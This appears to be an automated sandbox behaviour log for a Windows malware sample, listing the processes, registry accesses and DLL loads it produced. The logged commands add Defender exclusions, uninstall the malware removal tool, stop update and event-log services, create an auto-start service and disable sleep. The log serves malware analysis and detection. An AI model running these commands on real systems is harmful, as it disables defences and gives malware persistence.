      Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Users\user\Desktop\mav17final.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: mav17final.exeReversingLabs: Detection: 34%
      Source: mav17final.exeVirustotal: Detection: 16%
      Source: C:\Users\user\Desktop\mav17final.exeFile read: C:\Users\user\Desktop\mav17final.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\mav17final.exe "C:\Users\user\Desktop\mav17final.exe"
      Source: C:\Users\user\Desktop\mav17final.exeProcess created: C:\Users\user\Desktop\mav17final.exe "C:\Users\user\Desktop\mav17final.exe"
      Source: C:\Users\user\Desktop\mav17final.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      Source: C:\Users\user\Desktop\mav17final.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\dialer.exe"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\dialer.exe C:\Users\user\AppData\Local\Temp\dialer.exe
      Source: C:\Users\user\AppData\Local\Temp\dialer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\AppData\Local\Temp\dialer.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
      Source: C:\Users\user\AppData\Local\Temp\dialer.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
      Source: C:\Users\user\AppData\Local\Temp\dialer.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
      Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\AppData\Local\Temp\dialer.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
      Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\AppData\Local\Temp\dialer.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
      Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\AppData\Local\Temp\dialer.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
      Source: C:\Users\user\AppData\Local\Temp\dialer.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      Source: C:\Users\user\AppData\Local\Temp\dialer.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\AppData\Local\Temp\dialer.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\AppData\Local\Temp\dialer.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\AppData\Local\Temp\dialer.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "Build"
      Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\AppData\Local\Temp\dialer.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "Build" binpath= "C:\ProgramData\dialer.exe" start= "auto"
      Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\AppData\Local\Temp\dialer.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
      Source: C:\Users\user\AppData\Local\Temp\dialer.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "Build"
      Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\ProgramData\dialer.exe C:\ProgramData\dialer.exe
      Source: C:\ProgramData\dialer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\ProgramData\dialer.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
      Source: C:\ProgramData\dialer.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
      Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
      Source: C:\ProgramData\dialer.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
      Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\ProgramData\dialer.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
      Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\ProgramData\dialer.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
      Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\ProgramData\dialer.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\ProgramData\dialer.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      Source: C:\ProgramData\dialer.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\ProgramData\dialer.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\ProgramData\dialer.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      Source: C:\Windows\System32\wusa.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\ProgramData\dialer.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe
      Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\ProgramData\dialer.exeProcess created: C:\Windows\System32\dwm.exe dwm.exe
      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
      Source: C:\Users\user\Desktop\mav17final.exeProcess created: C:\Users\user\Desktop\mav17final.exe "C:\Users\user\Desktop\mav17final.exe"Jump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force"Jump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\dialer.exe"Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\dialer.exe C:\Users\user\AppData\Local\Temp\dialer.exeJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\dialer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\dialer.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\dialer.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvcJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\dialer.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvcJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\dialer.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauservJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\dialer.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bitsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\dialer.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvcJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\dialer.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\dialer.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\dialer.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvcJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\dialer.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\dialer.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "Build"Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\dialer.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "Build" binpath= "C:\ProgramData\dialer.exe" start= "auto"Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\dialer.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlogJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\dialer.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "Build"Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
      Source: C:\ProgramData\dialer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      Source: C:\ProgramData\dialer.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
      Source: C:\ProgramData\dialer.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
      Source: C:\ProgramData\dialer.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
      Source: C:\ProgramData\dialer.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
      Source: C:\ProgramData\dialer.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
      Source: C:\ProgramData\dialer.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
      Source: C:\ProgramData\dialer.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      Source: C:\ProgramData\dialer.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      Source: C:\ProgramData\dialer.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      Source: C:\ProgramData\dialer.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      Source: C:\ProgramData\dialer.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe
      Source: C:\ProgramData\dialer.exeProcess created: C:\Windows\System32\dwm.exe dwm.exe
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
      Source: C:\Users\user\Desktop\mav17final.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeSection loaded: vcruntime140.dllJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeSection loaded: python3.dllJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeSection loaded: libffi-8.dllJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeSection loaded: pdh.dllJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeSection loaded: wtsapi32.dllJump to behavior
      Source: C:\Users\user\Desktop\mav17final.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\dialer.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dllJump to behavior
      Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dllJump to behavior
      Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\wusa.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
      Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
      Source: C:\ProgramData\dialer.exeSection loaded: apphelp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
